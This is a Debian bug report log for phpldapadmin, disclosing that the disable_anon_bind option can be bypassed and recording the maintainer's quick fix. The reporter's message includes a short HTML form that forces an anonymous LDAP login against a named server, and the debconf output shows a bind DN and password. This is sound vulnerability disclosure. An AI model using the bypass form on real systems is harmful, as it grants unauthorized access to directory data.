Debian Bug report logs - #322423
$servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory

version graph

Package: phpldapadmin; Maintainer for phpldapadmin is Fabio Tranchitella <kobold@debian.org>; Source for phpldapadmin is src:phpldapadmin.

Reported by: Alexander Gerasiov <gq@cs.msu.su>

Date: Wed, 10 Aug 2005 15:48:03 UTC

Severity: grave

Tags: security

Found in version phpldapadmin/0.9.6c-4

Fixed in version phpldapadmin/0.9.6c-5

Done: Fabio Tranchitella <kobold@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Fabio Tranchitella <kobold@debian.org>:
Bug#322423; Package phpldapadmin. Full text and rfc822 format available.

Acknowledgement sent to Alexander Gerasiov <gq@cs.msu.su>:
New Bug report received and forwarded. Copy sent to Fabio Tranchitella <kobold@debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Alexander Gerasiov <gq@cs.msu.su>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: $servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory
Date: Wed, 10 Aug 2005 19:35:23 +0400
Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security

Even if you deny anonymous login with disable_anon_bind anyone could
access your LDAP server.

As I can see this option only hide checkbox from the input page, but
anyone can create workaround hack:

==========example form to log into eol.lvk.cs.msu.su========
<html><body>

<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php"
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>

</body></html>
=============================================================

I think, that version in sarge is also vulnerable to this trick.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages phpldapadmin depends on:
ii  apache [httpd]               1.3.33-6    versatile, high-performance HTTP s
ii  debconf                      1.4.30.13   Debian configuration management sy
ii  php4                         4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-cgi                     4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-ldap                    4:4.3.10-15 LDAP module for php4

-- debconf information:
  phpldapadmin/ldap-bindpw: secret
  phpldapadmin/ldap-tls: false
  phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
  phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
  phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#322423; Package phpldapadmin. Full text and rfc822 format available.

Acknowledgement sent to Fabio Tranchitella <kobold@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #10 received at submit@bugs.debian.org (full text, mbox):

From: Fabio Tranchitella <kobold@debian.org>
To: 322423@bugs.debian.org, Alexander Gerasiov <gq@cs.msu.su>
Cc: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Re: Bug#322423: $servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory
Date: Wed, 10 Aug 2005 17:55:18 +0200
[Message part 1 (text/plain, inline)]
Il giorno mer, 10/08/2005 alle 19.35 +0400, Alexander Gerasiov ha
scritto:
> Package: phpldapadmin
> Version: 0.9.6c-4
> Severity: critical
> Tags: security
> 
> Even if you deny anonymous login with disable_anon_bind anyone could
> access your LDAP server.
> 
> As I can see this option only hide checkbox from the input page, but
> anyone can create workaround hack:

Thanks for pointing this out.

I'm preparing a patch and a new package for this, it will be ready in a
few hours.

-- 
Fabio Tranchitella <kobold@debian.org>                        .''`.
Proud Debian GNU/Linux developer, admin and user.            : :'  :
                                                             `. `'`
   http://people.debian.org/~kobold/                           `-
_____________________________________________________________________
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#322423; Package phpldapadmin. Full text and rfc822 format available.

Acknowledgement sent to Fabio Tranchitella <kobold@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Reply sent to Fabio Tranchitella <kobold@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Alexander Gerasiov <gq@cs.msu.su>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #20 received at 322423-close@bugs.debian.org (full text, mbox):

From: Fabio Tranchitella <kobold@debian.org>
To: 322423-close@bugs.debian.org
Subject: Bug#322423: fixed in phpldapadmin 0.9.6c-5
Date: Wed, 10 Aug 2005 10:32:17 -0700
Source: phpldapadmin
Source-Version: 0.9.6c-5

We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:

phpldapadmin_0.9.6c-5.diff.gz
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.diff.gz
phpldapadmin_0.9.6c-5.dsc
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.dsc
phpldapadmin_0.9.6c-5_all.deb
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 322423@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fabio Tranchitella <kobold@debian.org> (supplier of updated phpldapadmin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Wed, 10 Aug 2005 17:14:01 +0000
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 0.9.6c-5
Distribution: unstable
Urgency: high
Maintainer: Fabio Tranchitella <kobold@debian.org>
Changed-By: Fabio Tranchitella <kobold@debian.org>
Description: 
 phpldapadmin - web based interface for administering LDAP servers
Closes: 322423
Changes: 
 phpldapadmin (0.9.6c-5) unstable; urgency=high
 .
   * debian/control: added build-deps on dpatch.
   * debian/patches/login.dpatch: really block anonymous login when disabled
     by config files. (Closes: #322423)
Files: 
 59bd6b27ce9498c9c4408a36dcdbb388 617 admin extra phpldapadmin_0.9.6c-5.dsc
 a4e84ec8e644aa65d2b735f87ee734d6 13449 admin extra phpldapadmin_0.9.6c-5.diff.gz
 20d8733a521b99277a526caf61bc9c57 714834 admin extra phpldapadmin_0.9.6c-5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC+jYJK/juK3+WFWQRAhowAKCgt4oKUWxK0vC4+fpgtAjtZY0NnwCeP+zs
uXNUDOVdCNcBowv8aWp1ekM=
=ooMS
-----END PGP SIGNATURE-----




Severity set to `grave'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 24 Jun 2007 21:41:03 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 08:52:44 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.